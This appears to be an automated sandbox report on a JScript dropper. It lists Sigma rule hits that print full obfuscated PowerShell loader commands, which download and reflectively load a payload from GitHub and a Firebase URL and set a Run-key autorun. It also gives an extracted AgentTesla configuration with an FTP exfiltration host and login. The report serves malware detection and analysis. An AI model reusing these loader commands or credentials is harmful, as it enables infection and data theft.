[dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Sys
                  Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAW
                  Sigma detected: Script Initiated Connection to Non-Local Network
                  Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5368, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", ProcessId: 5368, ProcessName: wscript.exe
                  Sigma detected: Change PowerShell Policies to an Insecure Level
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAW
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\alcatifa.vbs, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7176, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path
                  Sigma detected: Script Initiated Connection
                  Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 188.114.97.3, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 5368, Protocol: tcp, SourceIp: 192.168.2.7, SourceIsIpv6: false, SourcePort: 49699
                  Sigma detected: Suspicious Copy From or To System Directory
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs", CommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7176, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\alcatifa.vbs", ProcessId: 7296, ProcessName: cmd.exe
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\scan_374783.js", ProcessId: 5368, ProcessName: wscript.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAoACcAQgAnACsAJwAwADgAdQByAGwAIAA9ACAAQwAnACsAJwA3AEkAaAB0AHQAcABzADoALwAvAHIAYQAnACsAJwB3AC4AJwArACcAZwBpACcAKwAnAHQAaAB1ACcAKwAnAGIAdQAnACsAJwBzAGUAcgBjAG8AbgB0ACcAKwAnAGUAbgB0ACcAKwAnAC4AYwAnACsAJwBvAG0ALwBOACcAKwAnAG8ARABlAHQAZQBjAHQATwAnACsAJwBuAC8ATgBvAEQAZQAnACsAJwB0AGUAYwB0AE8AbgAvAHIAZQBmAHMAJwArACcALwBoACcAKwAnAGUAYQAnACsAJwBkACcAKwAnAHMAJwArACcALwAnACsAJwBtACcAKwAnAGEAaQBuAC8ARABlACcAKwAnAHQAYQBoAE4AbwAnACsAJwB0AGgALQBWACcAKwAnAC4AdAAnACsAJwB4AHQAQwAnACsAJwA3AEkAOwAgAEIAMAAnACsAJwA4AGIAYQBzACcAKwAnAGUANgA0AEMAJwArACcAbwAnACsAJwBuAHQAZQBuAHQAIAA9ACAAKABOAGUAdwAtAE8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQAnACsAJwBiAEMAbABpAGUAbgB0ACkALgBEACcAKwAnAG8AdwBuAGwAbwAnACsAJwBhAGQAJwArACcAUwB0AHIAJwArACcAaQAnACsAJwBuAGcAKABCACcAKwAnADAAOAB1ACcAKwAnAHIAbAAnACsAJwApADsAIABCADAAJwArACcAOAAnACsAJwBiAGkAbgBhACcAKwAnAHIAJwArACcAeQAnACsAJwBDACcAKwAnAG8AbgB0ACcAKwAnAGUAbgB0ACAAPQAnACsAJwAgAFsAUwB5AHMAdAAnACsAJwBlAG0ALgBDAG8AbgB2AGUAJwArACcAcgB0AF0AOgA6ACcAKwAnAEYAcgAnACsAJwBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuACcAKwAnAGcAKAAnACsAJwBCADAAJwArACcAOABiAGEAJwArACcAcwBlADYANAAnACsAJwBDAG8AbgB0ACcAKwAnAGUAbgB0ACkAOwAgACcAKwAnAEIAMAA4AGEAcwBzAGUAbQBiAGwAeQAgACcAKwAnAD0AIABbAFIAZQBmAGwAJwArACcAZQBjACcAKwAnAHQAJwArACcAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATAAnACsAJwBvAGEAZAAoAEIAMAA4ACcAKwAnAGIAaQBuAGEAcgB5AEMAJwArACcAbwAnACsAJwBuAHQAZQBuACcAKwAnAHQAKQAnACsAJwA7ACAAWwBkAG4AbABpAGIAJwArACcALgBJACcAKwAnAE8ALgBIACcAKwAnAG8AbQAnACsAJwBlACcAKwAnAF0AOgA6AFYAQQAnACsAJwBJACgAJwArACcAcABRACcAKwAnAFUAOAA4ADQAZQAnACsAJwA4AGUAMABkADUAMgAnACsAJwBmADAALQAnACsAJwBlADUAYQAnACsAJwBiAC0AJwArACcAMQAnACsAJwAxADYANAAtADAAMABjADYAJwArACcALQBhAGEAYQAyAGYAZgA1AGUAJwArACcAPQAnACsAJwBuACcAKwAnAGUAJwArACcAawAnACsAJwBvAHQAJgBhAGkAZABlAG0APQB0AGwAYQA/AHQAeAAnACsAJwB0ACcAKwAnAC4ANAAyADAAMgAwADEANwAwAG4AaQBnACcAKwAnAGkAcgBvAHIAZQAnACsAJwBpAHYAYQB4AC8AbwAvAG0AbwAnACsAJwBjAC4AJwArACcAdABvAHAAcwBwAHAAYQAuADQAMgAwADIAcwAnACsAJwB0AHAAeQByACcAKwAnAGMAJwArACcALwBiAC8AMAB2ACcAKwAnAC8AbQBvAGMAJwArACcALgAnACsAJwBzAGkAcABhAGUAbABnACcAKwAnAG8AbwBnACcAKwAnAC4AZQAnACsAJwBnAGEAcgBvACcAKwAnAHQAJwArACcAcwBlAHMAYQBiACcAKwAnAGUAcgBpAGYAJwArACcALwAvADoAJwArACcAcwAnACsAJwBwAHQAJwArACcAdABoAHAAUQBVACwAJwArACcAIABwAFEAVQAxAHAAUQBVACwAJwArACcAIABwAFEAVQBDADoAVAAnACsAJwA0AHkAUAByAG8AZwByAGEAbQBEAGEAdABhACcAKwAnAFQANAAnACsAJwB5ACcAKwAnAHAAUQBVACwAIABwACcAKwAnAFEAVQBhACcAKwAnAGwAYwBhAHQAaQAnACsAJwBmAGEAcAAnACsAJwBRAFUALAAgAHAAUQBVAEEAZABkAEkAbgBQAHIAJwArACcAbwBjAGUAcwBzADMAJwArACcAMgAnACsAJwBwAFEAVQAsACAAcABRACcAKwAnAFUAcABRAFUALABwACcAKwAnAFEAVQAnACsAJwBwACcAKwAnAFEAVQApACcAKQAgACAALQBDAHIAZQBwAEwAYQBDAGUAIAAoAFsAQwBoAGEAUgBdADEAMQAyACsAWwBDAGgAYQBSAF0AOAAxACsAWwBDAGgAYQBSAF0AOAA1ACkALABbAEMAaABhAFIAXQAzADQAIAAgAC0AQwByAGUAcABMAGEAQwBlACAAIAAoAFsAQwBoAGEAUgBdADYANwArAFsAQwBoAGEAUgBdADUANQArAFsAQwBoAGEAUgBdADcAMwApACwAWwBDAGgAYQBSAF0AMwA5ACAAIAAtAFIAZQBQAGwAQQBjAGUAIAAgACgAWwBDAGgAYQBSAF0ANgA2ACsAW
                  Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('B'+'08url = C'+'7Ihttps://ra'+'w.'+'gi'+'thu'+'bu'+'sercont'+'ent'+'.c'+'om/N'+'oDetectO'+'n/NoDe'+'tectOn/refs'+'/h'+'ea'+'d'+'s'+'/'+'m'+'ain/De'+'tahNo'+'th-V'+'.t'+'xtC'+'7I; B0'+'8bas'+'e64C'+'o'+'ntent = (New-Obj'+'ec'+'t System.Net.We'+'bClient).D'+'ownlo'+'ad'+'Str'+'i'+'ng(B'+'08u'+'rl'+'); B0'+'8'+'bina'+'r'+'y'+'C'+'ont'+'ent ='+' [Syst'+'em.Conve'+'rt]::'+'Fr'+'omBase64Strin'+'g('+'B0'+'8ba'+'se64'+'Cont'+'ent); '+'B08assembly '+'= [Refl'+'ec'+'t'+'ion.Assembly]::L'+'oad(B08'+'binaryC'+'o'+'nten'+'t)'+'; [dnlib'+'.I'+'O.H'+'om'+'e'+']::VA'+'I('+'pQ'+'U884e'+'8e0d52'+'f0-'+'e5a'+'b-'+'1'+'164-00c6'+'-aaa2ff5e'+'='+'n'+'e'+'k'+'ot&aidem=tla?tx'+'t'+'.42020170nig'+'irore'+'ivax/o/mo'+'c.'+'topsppa.4202s'+'tpyr'+'c'+'/b/0v'+'/moc'+'.'+'sipaelg'+'oog'+'.e'+'garo'+'t'+'sesab'+'erif'+'//:'+'s'+'pt'+'thpQU,'+' pQU1pQU,'+' pQUC:T'+'4yProgramData'+'T4'+'y'+'pQU, p'+'QUa'+'lcati'+'fap'+'QU, pQUAddInPr'+'ocess3'+'2'+'pQU, pQ'+'UpQU,p'+'QU'+'p'+'QU)') -CrepLaCe ([ChaR]112+[ChaR]81+[ChaR]85),[ChaR]34 -CrepLaCe ([ChaR]67+[ChaR]55+[ChaR]73),[ChaR]39 -RePlAce ([ChaR]66+[ChaR]48+[ChaR]56),[ChaR]36 -RePlAce ([ChaR]84+[ChaR]52+[ChaR]121),[ChaR]92)|.( ([sTRinG]$VeRBoSepreFerENce)[1,3]+'X'-JOin'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\Sys

                  Suricata Signatures

                  No Suricata rule has matched

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 14.2.AddInProcess32.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "sarthiever@fosna.net", "Password": "(=8fPSH$KO_!"}
                  Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49709 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000B.00000002.1435738029.0000027D1101C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1468589957.0000027D75CA0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000B.00000002.1476246463.00007FFAAC5C0000.00000004.00000800.00020000.00000000.sdmp
